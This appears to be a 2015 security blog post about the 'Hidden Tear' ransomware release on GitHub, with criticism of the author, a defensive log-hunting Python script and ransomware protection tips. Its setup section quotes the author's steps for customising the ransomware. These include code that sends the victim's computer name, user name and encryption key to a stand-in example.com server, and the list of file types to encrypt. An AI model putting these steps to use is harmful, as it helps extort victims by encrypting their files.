Wednesday, August 19, 2015

Skiddie can create ransomware using this source



Don't panic! You heard it right: anyone who wants to earn money by holding people's data for ransom now has a ready-made way to become a cyber criminal.

A Turkish security researcher named Utku Sen has posted a fully functional Ransomware code on open source code sharing website GitHub.

The ransomware, dubbed Hidden Tear, uses AES encryption to lock down files before displaying a ransom message warning to get users to pay up.
The currently undetectable version of the ransomware can be modified and implemented accordingly, as it contains every feature a cybercriminal can expect from modern malware.

Sen describes his Ransomware as "a ransomware-like file crypter sample which can be modified for specific purposes." This means even script kiddies can now develop their own Ransomware to threaten people.

The "Hidden Tear" Ransomware package consists of four files namely:

Hidden Tear Ransomware is capable of:
  • Using AES algorithm to encrypt files
  • Sending encryption key to a server
  • Encrypting files and decrypting them using a decrypter program with the encryption key
  • Creating a text file in Desktop with given message
  • Small file size (12 KB)
  • Evading detection by all standard anti-virus programs

How to Setup your Custom Ransomware Using Hidden Tear?


Sen has specified usage details as well. He says:

1. You need to have a web server that supports scripting languages such as PHP or Python. Then change the below-mentioned line with your URL. (Better use HTTPS connection in order to avoid eavesdropping):

string targetURL = "https://www.example.com/hidden-tear/write.php?info=";

2. The script should write the GET parameter to a text file. The sending process runs in the SendPassword() function:

string info = computerName + "-" + userName + " " + password;
var fullUrl = targetURL + info;
var conent = new System.Net.WebClient().DownloadString(fullUrl);

3. Target file extensions can also be changed. Default list:

var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};
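For defenders, the request built in step 2 is a usable network indicator: a GET whose query value is the client's own computer name, a hyphen, a user name, a space and the key. The sketch below is an added example (not code from Hidden Tear or from the original post) that hunts for that shape in proxy logs even when the path and parameter name have been changed. It assumes a proxy that logs full URLs, a hypothetical IP-to-hostname inventory, and a constructed heuristic for what a key looks like.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed asset inventory: client IP -> Windows computer name (constructed).
INVENTORY = {"10.0.0.5": "WS-FINANCE01", "10.0.0.9": "LAB-PC7"}

# Constructed proxy log lines (common log format, absolute URLs).
SAMPLE_LOG = """\
10.0.0.5 - - [19/Aug/2015:10:02:11 +0000] "GET https://www.example.com/hidden-tear/write.php?info=WS-FINANCE01-alice%20q7Gt!x2LmZp0RvB HTTP/1.1" 200 0
10.0.0.9 - - [19/Aug/2015:10:03:40 +0000] "GET http://intranet.example.com/search?q=LAB-PC7-printer%20driver HTTP/1.1" 200 5120
10.0.0.9 - - [19/Aug/2015:10:05:02 +0000] "GET http://cdn.example.net/k.aspx?d=lab-pc7-bob+Zk93%2FhQw1Tn%3DpL4s HTTP/1.1" 200 0
10.0.0.5 - - [19/Aug/2015:10:06:00 +0000] "GET http://www.example.org/news?id=42 HTTP/1.1" 200 9000
"""

LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "GET (?P<url>\S+) [^"]*"')

def looks_like_key(token):
    # Heuristic (assumption): a generated key is long and mixes letters and digits.
    return (len(token) >= 8
            and any(c.isalpha() for c in token)
            and any(c.isdigit() for c in token))

def find_key_uploads(log_text, inventory):
    """Return GET requests where a query value has the shape
    '<client's own computer name>-<user> <key>', whatever the parameter is called."""
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m or m["ip"] not in inventory:
            continue
        prefix = inventory[m["ip"]].lower() + "-"
        url = urlsplit(m["url"])
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            ident, sep, token = value.rpartition(" ")  # key follows the last space
            if (sep and ident.lower().startswith(prefix)
                    and len(ident) > len(prefix) and looks_like_key(token)):
                hits.append({"client": m["ip"], "server": url.netloc,
                             "param": name, "user": ident[len(prefix):],
                             "token": token})  # keep it: the decrypter needs this key
    return hits

if __name__ == "__main__":
    for hit in find_key_uploads(SAMPLE_LOG, INVENTORY):
        print(hit)
```

Matching on the requesting host's own name keeps false positives low: the search request in the second sample line starts with the host name but its trailing word fails the key heuristic.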

For Educational Purpose... REALLY!


Wait! Sen has something more to say, listening to which you might think...REALLY!!

With the whole project "Hidden Tear," there's an attached legal warning that says:
"While this may be helpful for some, there are significant risks. The 'Hidden Tear' may be used only for 'Educational Purposes.' Do not use it as a Ransomware! You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent."
Somebody should ask him: why instigate people to commit a crime? One can imagine what such "Educational Purposes" amount to, as there's a big chance of the ransomware popping up in attacks.

How to Protect Yourself from Ransomware Threat?


Utilize the Ransomware removal kit, which could help you deal with various variants of ransomware as well as help you unlock encrypted files without paying off the cyber crooks.
However, there are some important steps that should be considered to protect yourself from Ransomware threats.
  • Always keep regular backups of your important data.
  • Make sure you run an active anti-virus security suite of tools on your system.
  • Do not open email attachments from unknown sources.
  • Most importantly, always browse the Internet safely.
